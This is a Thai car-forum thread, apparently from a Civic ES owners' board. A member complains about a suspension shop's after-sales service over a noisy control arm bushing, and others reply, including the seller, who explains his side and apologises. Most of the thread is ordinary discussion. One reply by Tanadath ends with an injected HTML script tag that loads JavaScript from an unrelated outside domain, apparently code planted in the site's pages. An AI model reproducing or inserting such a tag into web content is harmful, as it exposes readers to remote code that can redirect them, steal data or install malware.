ตอบ
เจมคร้าบ


เข้าร่วม: 29 มกรา 2013
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 0
อังคาร, 29 มกรา 2013 21:47 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ขอแชร์ประสบการณ์หน่อยคับจากที่ได้ไปซื้อปีกนกค้ำล่างจากร้านชื่อดังร้านนึงย่านอุดมสุขคับ ผมเสียความรู้สึกมากเลยคับที่ได้รับบริการหลังการขายที่ไม่ค่อยน่าประทับใจเลยตอนที่ผมจะซื้อพูดจาดีมากแทบจนผมคิดว่าเอาหว่ะจะแต่งที่นี่แหล่ะให้ครบเลยแต่ก็ต้องมีเหตุให้ผมเปลี่ยนความคิดทันทีด้วยเหตุเกิดจาก ไอ้ตัวปีกค้ำล่างที่ผมไปถอยมาจากร้านดังนั้น มันมีเสียงดัง ผมลองเชคดูและสอบถามจากชาวesจึงรู้ว่าทางร้านไม่ได้อัดจารบีให้ผมเลยติดต่อไปทางร้านอีกครั้งเพื่อสอบถามว่าจะจัดการอย่างไรทางร้านได้บอกให้ผมมาเคลมได้ ผมจึงรีบมาเคลมทันทีนัดเวลาแล้วผมรีบไปตรงเวลาไปถึงทางร้านกลับไม่สนใจผมเลยเดินไปบอกช่างก็บ่ายเบี่ยงจนผมต้องโทรไปถามพี่ที่ขายของเค้าพูดจากับผมไม่ดีเลยผมเลยงงคับว่านี่ผมมาแก้งานที่เกิดจากทางร้านทำให้ผมไม่ดีนะไม่ใช่มาขอฟรีๆไม่ได้รับการบริการหลังการขายที่ดีเลยแถมยังมาคิดค่าบริการผมอีก ถ้ายังนี้หมายความว่าผมมาเสียค่าแก้งานไม่ใช่มาแก้งานที่ทางร้านทำให้ไม่ดีหน่ะซิ แต่โชคดีนิดนึงว่าผมเจอช่างคนนึงทำให้ผมดีทีเดียว ผมเสียความรู้สึกกับอู่นี้มากที่ตอนซื้อกับตอนบริการหลังการขายช่างต่างกันราวฟ้ากับเหวทั้งๆที่ช่วงที่ผมไปไม่มีลูกค้าเลย เลยอยากขอแชร์ให้เพื่อนๆรู้ว่ามีใครโดนแบบผมบ้าง ผมไปครั้งแรก ครั้งนี้เปนครั้งที่สองแล้วจะไม่ไปอีกแล้วคับ (ไม่ได้dis creditแต่อย่างใด)
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 29 มกรา 2013 22:05 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
...ใจเย็นก่อนคร้าบ ผมว่าไอ้ของที่ซื้อมาเนี่ยมันก็เป็นของก๊อปนะ คุณภาพก็ตามราคาคร้าบ มีอะไรก็ค่อยๆคุยกันผมว่าปัญหามันแก้ไขได้แน่ๆ  ผมเองผมซื้อขาย เข้าออกร้านแนวนี้แทบทุกวัน ผมว่าผมเป็นมากกว่าคำว่าลูกค้าประจำอีก แต่ผมคุยๆตรงๆกับเจ้า่ของร้านทุกที่คร้าบว่าไม่มีคำว่าสิทธิพิเศษ ตามคิว ตามราคา เพราะเวลาของทุกคนมีค่าเหมือนกันหมด งานช่าง งานหนัก งานเหนื่อย งานยาก และต้องทำให้จบให้ได้ เพราะทุกคนต่างก็รักรถตัวเองทั้งนั้น 
       ด้วยความเหนื่อย ความยุ่งบางทีปัญหาการสื่อสารก็เกิดขึ้นได้ แต่โดยส่วนตัวผม ผมไม่สนใจหรอกครับว่า เค้าจะมาต้อนรับ หรือพูดคุยกับผมดีรึเปล่า ขอให้ทำงานให้ผมจบ ในราคาที่สมเหตุสมผลก็พอแล้ว
       ค่อยๆคุยกันนะคร้าบ น้ำพึ่งเรือเสือพึ่งป่าฉันใด คนใช้รถกับอู่ก็ยังต้องพึ่งกันฉันนั้น
ได้รับคำขอบคุณจาก: tochi229  sukhothai  เค  davidian  Chatnar  coromant  song  mosonic  nick laemchabang  es330  สมชาย  TIRL_ES  hotline172 
chichimori


เข้าร่วม: 17 กันยา 2010
ตอบ: 194

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 107
ให้คำขอบคุณ: 117

ที่อยู่: รามอินทรา กม8
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 29 มกรา 2013 22:24 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ลงชื่อร้านไปเลยครับ   จะได้ไม่เจอแบบคุน ถ้าชัดๆจัดแผนที่ด้วยเลยครับ 555
ได้รับคำขอบคุณจาก: sukhothai  davidian  song 
เจมคร้าบ


เข้าร่วม: 29 มกรา 2013
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 0
อังคาร, 29 มกรา 2013 22:31 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ผมก็เข้าใจคับ แต่ว่ารถใครใครก้รักคับรถเรามีปัญหาเราก็อยากแก้ให้จบแต่ในเมื่อทางร้านทำให้เราไม่ดี เค้าก้ต้องเคลมให้เราก็ถูกต้องแล้วนี่คับผมซื้อของติดตั้งไม่ถึงสองอาทิตย์เลยคร้าบพี่น้อง แต่มาคิดค่าบริการมันไม่แฟร์คับผมว่า ของชิ้นนึงหลักหมื่นอ่ะคับ แถมยังพูดตะคอกเราอีก มันเซ็งduck คับ 555ตรงนี้แหล่ะคับที่มันจี๊ดดดด!!!เสียตังยังเสียความรู้สึกอีก T_T
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  เค  song  kaisuh  สมชาย 
trytobe


เข้าร่วม: 17 กรกฎา 2012
ตอบ: 40

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 28
ให้คำขอบคุณ: 24

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 29 มกรา 2013 23:21 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
แต่ก็แก้แล้ว ดีขึ้นแล้วใช่ไหมครับ เอาเถอะ เข้าศูนย์ก็ยังมีชุ่ยๆ ถ้าร้านใกล้ๆท้ายซอย ผมเคยจะเอาไปซ่อมเจอพี่คนนึงเปลี่ยนเบรค เทสรถเรียบร้อยเตรียมส่งรถ เผอิญผมเห็นฝาอะไรไม่รู้ตรงที่ปัดน้ำฝนเลยทักพี่ที่เอารถมาเปลี่ยนเบรค อ้าว!ฝาน้ำมันเบรคนิ จากนั้นก็ไม่ได้ใช้บริการอีกเลย เคยจัดชุดใหญ่เกี่ยวกับเครื่องไป ใส่กรองน้ำมันอะไรไม่รู้ราคาเท่ากรองแท้ เฮ้อ!!
ได้รับคำขอบคุณจาก: tochi229  davidian  song  สมชาย 
body19


เข้าร่วม: 27 มกรา 2010
ตอบ: 529

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 332
ให้คำขอบคุณ: 280

ที่อยู่: nonthaburi
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อังคาร, 29 มกรา 2013 23:44 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ตกลงร้านไหนนี่ครับ pm เเจ้งหน่อยได้มั๊ยครับ
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  song  koobe  ome_RX 
CROW


เข้าร่วม: 31 ตุลา 2012
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 33
ให้คำขอบคุณ: 137
อังคาร, 29 มกรา 2013 23:48 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
body19 พิมพ์ว่า:
ตกลงร้านไหนนี่ครับ pm เเจ้งหน่อยได้มั๊ยครับ



+1
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  song 
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 00:10 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ฝีมือช่างเป็นไปตามสันดานของแต่ละคน ครับ
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  song  สมชาย  yo555  moohanja 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 30 มกรา 2013 06:24 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ร้านพรเทพใช่มั้ยครับ ที่ว่าเค้าพูดจาไม่ดีนี่ประมาณไหนครับ

ผมก็เคยเจอแกพูดจาดีบ้าง ชวนผมคุยบ้าง บางทีก็ไม่คุยเลย ดูเครียดๆ ถามคำตอบคำ เข้าใจว่างานเยอะ เป็นบุคลิกครับ แต่งานที่ทำก็ออกมาดีนะ ที่ออกมาห่วยก็มีเพราะช่างบางคนนั่นแหละ แต่ร้านก็แก้ให้ตลอด

ถ้าไปครั้งแรกแล้วเจอแบบไม่ดีผมก็คงรู้สึกแบบเดียวกับคุณแน่ แต่เวลามีปัญหาช่วงล่างคิดถึงร้านนี้ตลอด ไปแล้วจบแก้ตรงปัญหา พี่แกไม่พูดกับผมก็ไม่เป็นไร

ไม่ได้ปกป้อง แต่เจอมาอย่างนี้จริงๆ
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  song  tokmun002  cisco  body19  es330  สมชาย  moohanja 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 06:35 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
หลายร้านที่มีชื่อเสียงจะพบปัญหาอย่างนี้ด้วยกันทั้งนั้น น่าเห็นใจที่งานเยอะแล้วช่างงานมากอาจรีบไปหน่อย พอเพิ่มช่างอาจได้ช่างที่ยังไม่เข้าใจหรือชำนาญพอ เลยเกิดปัญหา เป็นข้อคิดกับทางร้านว่าทำอย่างไรจะรักษาระดับไว้ได้ ทางลูกค้าถ้าคิดว่ายังต้องการบริการจากทางร้านนั้นๆก็ควรให้โอกาสทางร้านแก้งานอย่าเพิ่งต่อว่ากันเลยครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  song  tokmun002  body19  สมชาย 
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 30 มกรา 2013 06:40 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ผมคนนึงใช้บริการอยู่ครั้งแรกที่ไปขี่มอไซค์ไปซื้อปีกนกตอนเย็นเจอพี่คนขายเค้ากวนกินเบียร์เลยครับ ช่างก็คุยดีนาาา. แล้วอีกประมาณ อาทิตย์กว่าๆถึงเอารถกลับเข้ามาใส่ซึ่งเป็นวันเสาร์ ตอนเช้ารถเยอะมากแต่คันอื่นจะทำช่วงล่างค่อนข้างงานจะช้ากว่าผม. ทางเจ้าของร้านเค้าได้เดินมาถามผมว่าทำอะไรพอผมแจ้งไปพี่เค้าก็รับทราบและพอมีที่ว่างพอที่รถคันนึงจะเข้าไปได้พี่พี่เค้าก็เรียกเอารถผมเข้าไปทำก่อนเลยครับ. แต่ไม่ได้รู้จักกันแต่อย่างใด. บุคคลิคของพี่แกเป็นอย่างนั้นตามที่คุณข้างบนบอกน่ะครับ. แต่ที่ผมประทับใจก็ตอนมาซื้อสเปเซอร์ที่ร้านพี่เค้า. ทุกครั้งที่ช่างเอางานไปกลึงเสร็จเห็นพี่เค้าจะเดินกลับมาดูงานทุกครั้งที่ช่างทำอยู่ประมาณ 3-4ครั้งและยังแนะนำวิธีการใส่เข้าไปในโช้คโดยผมจะนำไปใส่เอง. ที่ผมเข้าไปก็จะประทับใจมากกว่าครับ.
ได้รับคำขอบคุณจาก: tochi229  sukhothai  davidian  song  es330  สมชาย 
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 30 มกรา 2013 07:52 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
สินค้าเขามีรับประกันหรือเปล่าครับ
ถ้ามี แล้วมาคิดค่าแก้งาน อันนี้ไม่สวย และขอประณาม ด้วยครับ

ถ้าไม่มี ขายตามสภาพ อันนี้ อีกเรื่องหนึ่ง ซึ่งทางร้าน คงบอกให้คนซื้อเข้าใจไปแล้ว
ได้รับคำขอบคุณจาก: davidian  song  สมชาย 
sukhothai


เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
พุธ, 30 มกรา 2013 07:57 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ได้ลองคุยลองปรึกษาพี่เขาดูหรือยังครับ ผมว่าพี่เขาน่าจะดูแลอยู่นะครับถ้าคุยกัน

ร้านนี้ผมก็ไปบ่อย แต่ก็ไม่ค่อยได้คุยกับพี่เขาซักเท่าไหร่ อาจจะเหมือนที่หลายๆ

ท่านบอกครับบุคลิกพี่เขาเป็นอย่างนั้นครับ แต่ถ้ามีปัญหาถามพี่เขาก็ตอบนะ

บางครั้งก็แนะนำ ส่วนช่างก็อย่างว่าแหละมีชุ่ยเกือบทุกที่ บางร้านที่ผมเจอนะ

มันลืมยำล้อให้ผมเลยละ (เกือบตาย) แต่ร้านพี่เขาผมว่าช่างเก่งใช้ได้ที่เดียว

เมื่อประมาณ2อาทิตย์ที่แล้วเบรคแล้วหน้าสั่น พอดีขับรถผ่านก็เลยแวะว่าจะถาม

อาการแต่พี่เขาไม่อยู่ ก็คุยกับช่างๆก็แนะนำว่าลองไปเจียร์ประชิดแถมบอกพิกัดร้าน

ให้ด้วย สรุปงานจบครับ (ใจเย็นแล้วโทรคุยกับพี่เขาเลยครับ)
ได้รับคำขอบคุณจาก: davidian  song  สมชาย 
koobe


ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ที่อยู่: เพชรบุรี-กระทุ่มแบน-คลองเตย-ลาดกระบัง
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 30 มกรา 2013 07:57 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ปีกนกที่ว่าใส่แล้วมีเสียงดังนี่งานตัวไหนครับ ของ TEE MONO หรือ K-SPORT ถ้าจัดที่ร้านพรเทพ ทางเจ้าของร้านแค่รับใส่ให้นะครับ (ผมก็ซื้อและใช้บริการที่ร้านนี้ เราต้องแยกประเด็นก่อนว่า ปัญหาเกิดจากสินค้า หรือบริการ แล้วค่อยพาทพิงว่าอะไรไม่ดี )ส่วนของผม ตอนติดตั้งก็ไม่ได้ทาจารบีหรือหล่อลื่นที่บูชนะ และใช้มาก็ไม่ดัง และส่วนมากที่เข้าไปใส่ๆกันก็ไมดัง ส่วนเรื่องเข้าไปแก้งาน แล้วไม่ประทับใจนี่ก็อีกเรื่องหนึ่ง ใจเย็นๆลองคิดอะไร ทำอะไร ช้าๆหน่อยแบบคนแก่ๆก็จะดีนะครับ เฮ้อ//พี่เราโดนตั้งแต่ต้นปีเลย เหนื่อยใจแทน


แก้ไขล่าสุดโดย เมื่อ พุธ, 30 มกรา 2013 10:42, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: davidian  Chatnar  song  lkki5  body19  สมชาย 
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 30 มกรา 2013 08:36 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ใจเย็นๆ
ได้รับคำขอบคุณจาก: tochi229  song 
Chonchy


ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

ที่อยู่: แม่กลอง...มหาชัย...
ปี: 2001
พุธ, 30 มกรา 2013 09:11 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ติดตาม...อิอิ
ได้รับคำขอบคุณจาก: song  sukhothai 
TEE_MONO


ชื่อเล่น: ตี๋

เข้าร่วม: 30 พฤศจิกา 2009
ตอบ: 1050

ประธาน
ประธาน

ได้รับคำขอบคุณ: 2127
ให้คำขอบคุณ: 755

ที่อยู่: บางนา (จันทร์-ศุกร์) ชลบุรี (เสาร์-อาทิตย์)
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 30 มกรา 2013 09:13 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
เจมคร้าบ พิมพ์ว่า:
ขอแชร์ประสบการณ์หน่อยคับจากที่ได้ไปซื้อปีกนกค้ำล่างจากร้านชื่อดังร้านนึงย่านอุดมสุขคับ ผมเสียความรู้สึกมากเลยคับที่ได้รับบริการหลังการขายที่ไม่ค่อยน่าประทับใจเลยตอนที่ผมจะซื้อพูดจาดีมากแทบจนผมคิดว่าเอาหว่ะจะแต่งที่นี่แหล่ะให้ครบเลยแต่ก็ต้องมีเหตุให้ผมเปลี่ยนความคิดทันทีด้วยเหตุเกิดจาก ไอ้ตัวปีกค้ำล่างที่ผมไปถอยมาจากร้านดังนั้น มันมีเสียงดัง ผมลองเชคดูและสอบถามจากชาวesจึงรู้ว่าทางร้านไม่ได้อัดจารบีให้ผมเลยติดต่อไปทางร้านอีกครั้งเพื่อสอบถามว่าจะจัดการอย่างไรทางร้านได้บอกให้ผมมาเคลมได้ ผมจึงรีบมาเคลมทันทีนัดเวลาแล้วผมรีบไปตรงเวลาไปถึงทางร้านกลับไม่สนใจผมเลยเดินไปบอกช่างก็บ่ายเบี่ยงจนผมต้องโทรไปถามพี่ที่ขายของเค้าพูดจากับผมไม่ดีเลยผมเลยงงคับว่านี่ผมมาแก้งานที่เกิดจากทางร้านทำให้ผมไม่ดีนะไม่ใช่มาขอฟรีๆไม่ได้รับการบริการหลังการขายที่ดีเลยแถมยังมาคิดค่าบริการผมอีก ถ้ายังนี้หมายความว่าผมมาเสียค่าแก้งานไม่ใช่มาแก้งานที่ทางร้านทำให้ไม่ดีหน่ะซิ แต่โชคดีนิดนึงว่าผมเจอช่างคนนึงทำให้ผมดีทีเดียว ผมเสียความรู้สึกกับอู่นี้มากที่ตอนซื้อกับตอนบริการหลังการขายช่างต่างกันราวฟ้ากับเหวทั้งๆที่ช่วงที่ผมไปไม่มีลูกค้าเลย เลยอยากขอแชร์ให้เพื่อนๆรู้ว่ามีใครโดนแบบผมบ้าง ผมไปครั้งแรก ครั้งนี้เปนครั้งที่สองแล้วจะไม่ไปอีกแล้วคับ (ไม่ได้dis creditแต่อย่างใด)



เจมคร้าบ พิมพ์ว่า:
ผมก็เข้าใจคับ แต่ว่ารถใครใครก้รักคับรถเรามีปัญหาเราก็อยากแก้ให้จบแต่ในเมื่อทางร้านทำให้เราไม่ดี เค้าก้ต้องเคลมให้เราก็ถูกต้องแล้วนี่คับผมซื้อของติดตั้งไม่ถึงสองอาทิตย์เลยคร้าบพี่น้อง แต่มาคิดค่าบริการมันไม่แฟร์คับผมว่า ของชิ้นนึงหลักหมื่นอ่ะคับ แถมยังพูดตะคอกเราอีก มันเซ็งduck คับ 555ตรงนี้แหล่ะคับที่มันจี๊ดดดด!!!เสียตังยังเสียความรู้สึกอีก T_T




ผมตอบ คุณเจม เมื่อวานคุณเจมโทรหาผม สามรอบ ผมบอก อย่าเข้าไปเร็วเพราะทางร้าคิวมาก ให้เข้าไปเย็นหน่อยงานที่ร้านลน อยู่ แล้ว รอบสุดท้าย
คุณโทรมาตอนห้าโมงเย็น บอกถึงร้าน บอกช่างแล้ว ไม่มีใครสนใจ คุณโทรมาหาผม ผมบอกคุณว่า ไปหาช่างชื่อบีหรือ ไปหา พี่ใหม่แล้วบอกพี่ใหม่ เพราะถ้าหัวหน้าไม่ได้สั่งลูกน้องก็ทำงานอื่น ให้ไปบอกหัวหน้า แล้วผมย้ำให้ไปบอกพี่ใหม่ ประมาณห้านาที่พี่ใหม่โทรมาบอกผมว่ามีคนมาเคมบูชปีกนกหลัง ของ EK หรือ EG ประมาณนี้ ผมบอกให้เคมไปเลยมีของที่ร้าน ผมขายบูชผมให้เคมถ้าบูชมันแตกก่อนกำหนดในกรณีที่แตก เท่านั้น และในราคาที่ขายเข้าก็ทำความเข้าใจตั้งแต่ต้นว่าราคานี คุณซื้อไปไส่เอง ผมทั้งแนะนำทั้งบอกปัญหาคุณว่ามันหน้าจะเกิดจากอะไร วันที่คุณไส่ผมก็แค่เอาของมาส่งคุณ ไม่ได้ดูการไส่ด้วย
คำแนะนำของผมเมื่อว่านไม่มีคำหยาบเลยมีคำลงท้ายด้วยคำว่าครับทุกคำ
 
ผมว่ามันเกิดจาการสือสารที่จะบอกงาน กับช่างเราจะต้องบอกเจ้าของร้านว่าจะทำอะไร เจ้าของร้านก็จะมีหน้าที่หาที่ลงให้คุณทำได้กี่โมงคิวไหน ถ้าเราไปบอกช่างช่างก็ทำงานที่ตนได้รับมอบหมายจากพี่ใหม่ให้เสร็จถึงจะมีคิว ผมเองทำรถเหมือนกันและทำที่นี้ สิ่งแรกที่ผมจะทำรถคือบอกพี่ใหม่ว่าจะทำอะไรผมรีบหรือไม่รีบมีคิวมัย ถ้าไม่มีผมไปทำ อย่างอื่นก่อนเดี๋ยวกลับมาทำ

ผมว่าทุกคนรักรถผมเข้าใจคุณคุณก็ต้องเข้าใจช่างเข้าใจคนทำว่าขันตอนการทำงานของร้านั้นเป็นยังงัย
ถ้าทางร้าหรือผมทำให้คุณไม่ถูกใจต้องขอโทษด้วยที่ทำให้คุณไม่พอใจกับบริการของทางร้านและของผม ที่ขายของมา 5 ปีคุณเป็นคนแรกและผมจะนำทุกคำพูดของคุณไปปรับปรุงตัวผมคับขอบคุณมากคับและขอโทษด้วยคับที่ทำให้เสียเวลา
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
พุธ, 30 มกรา 2013 09:14 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ปีกนก บูซยูรีเทน เรื่องปกติที่จะร้องอ๊อดๆ ถึงอัดจารบีคิดหรอครับมันจะไม่แห้ง ต้องเป็นจารบีแบบหล่อลื่นยูรีเทนโดยเฉพาะ จะออกเหนียวๆ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  song  koobe  tochi229  cisco  สมชาย  TIRL_ES 
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 30 มกรา 2013 09:16 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
davidian พิมพ์ว่า:
ใจเย็นๆ


+1คับ
ได้รับคำขอบคุณจาก: song  tochi229 
tochi229


ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

ที่อยู่: เกษตร-นวมินทร์ , ES เมืองทอง, นครศร๊ฯ
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 09:27 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
TEE_MONO พิมพ์ว่า:

เจมคร้าบ พิมพ์ว่า:
ขอแชร์ประสบการณ์หน่อยคับจากที่ได้ไปซื้อปีกนกค้ำล่างจากร้านชื่อดังร้านนึงย่านอุดมสุขคับ ผมเสียความรู้สึกมากเลยคับที่ได้รับบริการหลังการขายที่ไม่ค่อยน่าประทับใจเลยตอนที่ผมจะซื้อพูดจาดีมากแทบจนผมคิดว่าเอาหว่ะจะแต่งที่นี่แหล่ะให้ครบเลยแต่ก็ต้องมีเหตุให้ผมเปลี่ยนความคิดทันทีด้วยเหตุเกิดจาก ไอ้ตัวปีกค้ำล่างที่ผมไปถอยมาจากร้านดังนั้น มันมีเสียงดัง ผมลองเชคดูและสอบถามจากชาวesจึงรู้ว่าทางร้านไม่ได้อัดจารบีให้ผมเลยติดต่อไปทางร้านอีกครั้งเพื่อสอบถามว่าจะจัดการอย่างไรทางร้านได้บอกให้ผมมาเคลมได้ ผมจึงรีบมาเคลมทันทีนัดเวลาแล้วผมรีบไปตรงเวลาไปถึงทางร้านกลับไม่สนใจผมเลยเดินไปบอกช่างก็บ่ายเบี่ยงจนผมต้องโทรไปถามพี่ที่ขายของเค้าพูดจากับผมไม่ดีเลยผมเลยงงคับว่านี่ผมมาแก้งานที่เกิดจากทางร้านทำให้ผมไม่ดีนะไม่ใช่มาขอฟรีๆไม่ได้รับการบริการหลังการขายที่ดีเลยแถมยังมาคิดค่าบริการผมอีก ถ้ายังนี้หมายความว่าผมมาเสียค่าแก้งานไม่ใช่มาแก้งานที่ทางร้านทำให้ไม่ดีหน่ะซิ แต่โชคดีนิดนึงว่าผมเจอช่างคนนึงทำให้ผมดีทีเดียว ผมเสียความรู้สึกกับอู่นี้มากที่ตอนซื้อกับตอนบริการหลังการขายช่างต่างกันราวฟ้ากับเหวทั้งๆที่ช่วงที่ผมไปไม่มีลูกค้าเลย เลยอยากขอแชร์ให้เพื่อนๆรู้ว่ามีใครโดนแบบผมบ้าง ผมไปครั้งแรก ครั้งนี้เปนครั้งที่สองแล้วจะไม่ไปอีกแล้วคับ (ไม่ได้dis creditแต่อย่างใด)



เจมคร้าบ พิมพ์ว่า:
ผมก็เข้าใจคับ แต่ว่ารถใครใครก้รักคับรถเรามีปัญหาเราก็อยากแก้ให้จบแต่ในเมื่อทางร้านทำให้เราไม่ดี เค้าก้ต้องเคลมให้เราก็ถูกต้องแล้วนี่คับผมซื้อของติดตั้งไม่ถึงสองอาทิตย์เลยคร้าบพี่น้อง แต่มาคิดค่าบริการมันไม่แฟร์คับผมว่า ของชิ้นนึงหลักหมื่นอ่ะคับ แถมยังพูดตะคอกเราอีก มันเซ็งduck คับ 555ตรงนี้แหล่ะคับที่มันจี๊ดดดด!!!เสียตังยังเสียความรู้สึกอีก T_T




ผมตอบ คุณเจม เมื่อวานคุณเจมโทรหาผม สามรอบ ผมบอก อย่าเข้าไปเร็วเพราะทางร้าคิวมาก ให้เข้าไปเย็นหน่อยงานที่ร้านลน อยู่ แล้ว รอบสุดท้าย
คุณโทรมาตอนห้าโมงเย็น บอกถึงร้าน บอกช่างแล้ว ไม่มีใครสนใจ คุณโทรมาหาผม ผมบอกคุณว่า ไปหาช่างชื่อบีหรือ ไปหา พี่ใหม่แล้วบอกพี่ใหม่ เพราะถ้าหัวหน้าไม่ได้สั่งลูกน้องก็ทำงานอื่น ให้ไปบอกหัวหน้า แล้วผมย้ำให้ไปบอกพี่ใหม่ ประมาณห้านาที่พี่ใหม่โทรมาบอกผมว่ามีคนมาเคมบูชปีกนกหลัง ของ EK หรือ EG ประมาณนี้ ผมบอกให้เคมไปเลยมีของที่ร้าน ผมขายบูชผมให้เคมถ้าบูชมันแตกก่อนกำหนดในกรณีที่แตก เท่านั้น และในราคาที่ขายเข้าก็ทำความเข้าใจตั้งแต่ต้นว่าราคานี คุณซื้อไปไส่เอง ผมทั้งแนะนำทั้งบอกปัญหาคุณว่ามันหน้าจะเกิดจากอะไร วันที่คุณไส่ผมก็แค่เอาของมาส่งคุณ ไม่ได้ดูการไส่ด้วย
คำแนะนำของผมเมื่อว่านไม่มีคำหยาบเลยมีคำลงท้ายด้วยคำว่าครับทุกคำ

